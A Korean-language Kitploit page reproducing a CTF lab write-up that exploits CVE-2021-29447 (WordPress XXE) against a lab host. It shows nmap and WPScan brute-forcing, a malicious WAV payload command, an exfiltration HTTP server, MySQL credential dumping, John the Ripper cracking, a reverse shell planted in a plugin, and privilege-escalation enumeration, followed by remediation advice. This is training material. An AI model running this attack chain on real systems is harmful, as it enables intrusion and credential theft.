Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Project-Project-Chimera-Exploiting-a-Modern-WordPress-XXE-to-Pillage-Secrets- — 목표는 WordPress 기반 웹 애플리케이션에 대한 전면적인 보안 평가를 수행하여 궁극적으로 서버를 완전히 장악하는 것입니다. 이 평가에서는 특정 실제 취약점(CVE-2021-29447)을 악용하여 초기 액세스 권한을 획득하는 데 초점을 맞춥니다. | Kitploit
도구/GitHubGitHub/artemcyberlab/project-project-chimera-exploiting-a-modern-wordpress-xxe-to-pillage-secrets-
Privilege EscalationReconnaissancePassword AttacksVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPost-ExploitationPenetration Testing

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
Learning & Education
Labs & Practice
GitHubartemcyberlab/project-project-chimera-exploiting-a-modern-wordpress-xxe-to-pillage-secrets-

Project-Project-Chimera-Exploiting-a-Modern-WordPress-XXE-to-Pillage-Secrets-

목표는 WordPress 기반 웹 애플리케이션에 대한 전면적인 보안 평가를 수행하여 궁극적으로 서버를 완전히 장악하는 것입니다. 이 평가에서는 특정 실제 취약점(CVE-2021-29447)을 악용하여 초기 액세스 권한을 획득하는 데 초점을 맞춥니다.

저장소 보기
10년 전아직 검토되지 않음

프로젝트 목표: 취약한 WordPress 설치를 대상으로 CVE-2021-29447(미디어 라이브러리의 XXE)을 악용하여 원격 코드 실행 및 전체 시스템 손상까지 이르는 완전한 공격 체인을 시연하는 것.

1단계: 정찰 및 정보 수집 Nmap을 사용한 네트워크 스캔:

bash

열린 포트를 빠르게 발견하기 위한 SYN 스캔

nmap -sS -T4 10.201.3.95

상세 버전 및 스크립트 스캔

nmap -sV -sC -p22,80,3306 10.201.3.95 -oA initial_scan 결과:

text PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 80/tcp open http Apache/2.4.18 (Ubuntu) |_http-generator: WordPress 5.6.2 3306/tcp open mysql MySQL 5.7.33 WPScan을 사용한 WordPress 열거:

bash

사용자 열거

wpscan --url http://10.201.3.95/ --enumerate u

비밀번호 무차별 대입 공격

wpscan --url http://10.201.3.95/ --usernames test-corp --passwords passwords.txt 획득한 자격 증명:

사용자명: test-corp | 비밀번호: test

사용자명: corp-001 | 비밀번호: teddybear (나중에 크랙됨)

2단계: 초기 접근 - XXE 익스플로잇 (CVE-2021-29447) 악성 WAV 파일 생성:

bash echo -en 'RIFF\x85\x00\x00\x00WAVEiXML\x79\x00\x00\x00%remote;%param;%send;]>\x00' > payload.wav 외부 DTD 페이로드 (yup.dtd):

xml

">

데이터 유출을 위한 HTTP 서버:

bash python3 -m http.server 8000 데이터 디코딩 PHP 스크립트:

php

추출된 데이터베이스 자격 증명:

php define('DB_NAME', 'wordpressdb2'); define('DB_USER', 'thedarktangent'); define('DB_PASSWORD', 'sUp3rS3cret132'); define('DB_HOST', 'localhost'); 3단계: 데이터베이스 접근 및 자격 증명 수집 MySQL 연결:

bash mysql -h 10.201.3.95 -u thedarktangent -p 실행된 SQL 쿼리:

sql SHOW DATABASES; USE wordpressdb2; SHOW TABLES; SELECT user_login, user_pass FROM wptry_users; 획득한 사용자 해시:

text +------------+------------------------------------+ | user_login | user_pass | +------------+------------------------------------+ | corp-001 | $P$B4fu6XVPkSU5KcKUsP1sD3Ul7G3oae1 | | test-corp | $P$Bk3Zzr8rb.5dimh99TRE1krX8X85eR0 | +------------+------------------------------------+ John the Ripper를 사용한 비밀번호 크래킹:

bash

해시 파일 생성

cat > wp_hashes.txt << EOF corp-001:$P$B4fu6XVPkSU5KcKUsP1sD3Ul7G3oae1 test-corp:$P$Bk3Zzr8rb.5dimh99TRE1krX8X85eR0 EOF

해시 크래킹

john --wordlist=/usr/share/wordlists/rockyou.txt wp_hashes.txt john --show wp_hashes.txt 크래킹된 비밀번호:

corp-001:teddybear

test-corp:test

4단계: 권한 상승 및 RCE 리버스 셸 페이로드 (수정된 Hello Dolly 플러그인):

php

Netcat 리스너:

bash nc -nvlp 4444 획득한 셸 접근:

text Connection received on 10.201.3.95 42314 Linux ubuntu 4.4.0-210-generic #242-Ubuntu SMP uid=33(www-data) gid=33(www-data) groups=33(www-data) 5단계: 사후 익스플로잇 (완료 대기 중) 다음 세션을 위한 명령어:

bash

플래그 찾기

find / -name flag.txt 2>/dev/null find / -name root.txt 2>/dev/null find / -name user.txt 2>/dev/null

권한 상승 열거

sudo -l find / -perm -u=s -type f 2>/dev/null cat /etc/crontab ps aux uname -a cat /etc/os-release 보안 발견 사항 및 권장 사항 식별된 중요 취약점:

CVE-2021-29447 - WordPress 미디어 라이브러리의 XML 외부 엔터티 처리

취약한 비밀번호 정책 - 쉽게 추측 가능한 비밀번호 (test, teddybear)

노출된 데이터베이스 서비스 - MySQL이 원격으로 접근 가능

오래된 소프트웨어 - 알려진 취약점이 있는 WordPress 5.6.2

과도한 사용자 권한 - 플러그인 수정 권한이 있는 비관리자 사용자

수정 권장 사항:

최신 WordPress 버전으로 즉시 업데이트

강력한 비밀번호 정책 및 2단계 인증 구현

데이터베이스 접근을 localhost로만 제한

정기적인 보안 패치 및 취약점 스캔

사용자 계정에 대한 최소 권한 원칙

프로젝트 상태: 90% 완료 - 리버스 셸 획득, 최종 플래그 캡처 및 권한 상승은 새 IP 할당 대기 중.

파트 2 ! 플래그 최종 단계: 사후 익스플로잇 및 플래그 캡처 목표: 전체 시스템 손상 달성 및 최종 플래그 캡처.

수행된 작업:

리버스 셸 활성화:

WordPress 관리자 패널 (/wp-admin/plugin-editor.php)에서 hello.php 플러그인 파일 편집

Kali 머신(10.201.6.187:4444)으로 다시 연결되도록 구성된 PHP 리버스 셸 페이로드 삽입

다음 주소에 접근하여 페이로드 실행: http://ip-10-201-46-113.ec2.internal/wp-content/plugins/hello.php

성공적인 셸 접근:

www-data 사용자로 리버스 셸 연결 획득

셸 출력:

text Connection received on 10.201.46.113 46240 Linux ubuntu 4.4.0-210-generic #242-Ubuntu SMP uid=33(www-data) gid=33(www-data) groups=33(www-data) 파일 시스템 탐색:

사용자 디렉토리 발견: /home/stux/

플래그 디렉토리 발견: /home/stux/flag/

플래그 파일 위치 확인: /home/stux/flag/flag.txt

플래그 추출:

실행된 명령어: cat /home/stux/flag/flag.txt

캡처된 플래그: thm{28bd2a5b7e0586a6e94ea3e0adbd5f2f16085c}

전체 공격 체인 요약 단계 사용된 기술 결과

  1. 정찰 Nmap 스캔 Apache/2.4.18에서 WordPress 5.6.2 발견
  2. 초기 접근 WPScan + 비밀번호 무차별 대입 test-corp:test로 관리자 접근 권한 획득
  3. 취약점 익스플로잇 CVE-2021-29447 (XXE) 악성 WAV 파일을 통해 wp-config.php 추출
  4. 데이터 유출 MySQL 자격 증명 수집 DB 자격 증명 획득: thedarktangent:sUp3rS3cret132
  5. 권한 상승 WordPress 관리자 기능 리버스 셸 접근을 위해 플러그인 편집
  6. 최종 손상 시스템 탐색 /home/stux/flag/flag.txt에서 최종 플래그 캡처 주요 보안 발견 사항 악용된 중요 취약점:

CVE-2021-29447 - WordPress 미디어 라이브러리의 XML 외부 엔터티 처리

취약한 비밀번호 정책 - 쉽게 추측 가능한 비밀번호 (test, teddybear)

과도한 사용자 권한 - 플러그인을 수정할 수 있는 비관리자 사용자

오래된 소프트웨어 - 알려진 취약점이 있는 WordPress 5.6.2

정보 노출 - wp-config.php의 데이터베이스 자격 증명

보안 권장 사항:

✅ 최신 WordPress 버전으로 즉시 업데이트

✅ 2FA가 포함된 강력한 비밀번호 정책 구현

✅ 정기적인 보안 패치 및 취약점 스캔

✅ 사용자 계정에 대한 최소 권한 원칙

✅ 파일 업로드 기능 및 XML 처리 제한

결론 Project Chimera는 초기 정찰부터 전체 시스템 손상까지의 완전한 공격 체인을 성공적으로 시연했습니다. 이 실습은 겉보기에 사소해 보이는 XML 파싱 취약점(CVE-2021-29447)이 열악한 보안 관행과 결합되어 어떻게 전체 시스템 장악으로 이어질 수 있는지 강조했습니다.

이 프로젝트는 다음의 중요성을 강조했습니다:

정기적인 소프트웨어 업데이트 및 패치 관리

강력한 인증 메커니즘

적절한 접근 제어 및 권한 관리

포괄적인 보안 모니터링

최종 상태: ✅ 100% 완료 - 모든 목표 달성, 플래그 캡처: thm{28bd2a5b7e0586a6e94ea3e0adbd5f2f16085c}

Project Chimera는 단일 취약점이 다른 보안 약점과 결합될 때 완전한 시스템 손상으로 이어질 수 있으므로, 방어에 있어 심층 방어가 필요하다는 강력한 교훈을 제공합니다.

도구 다운로드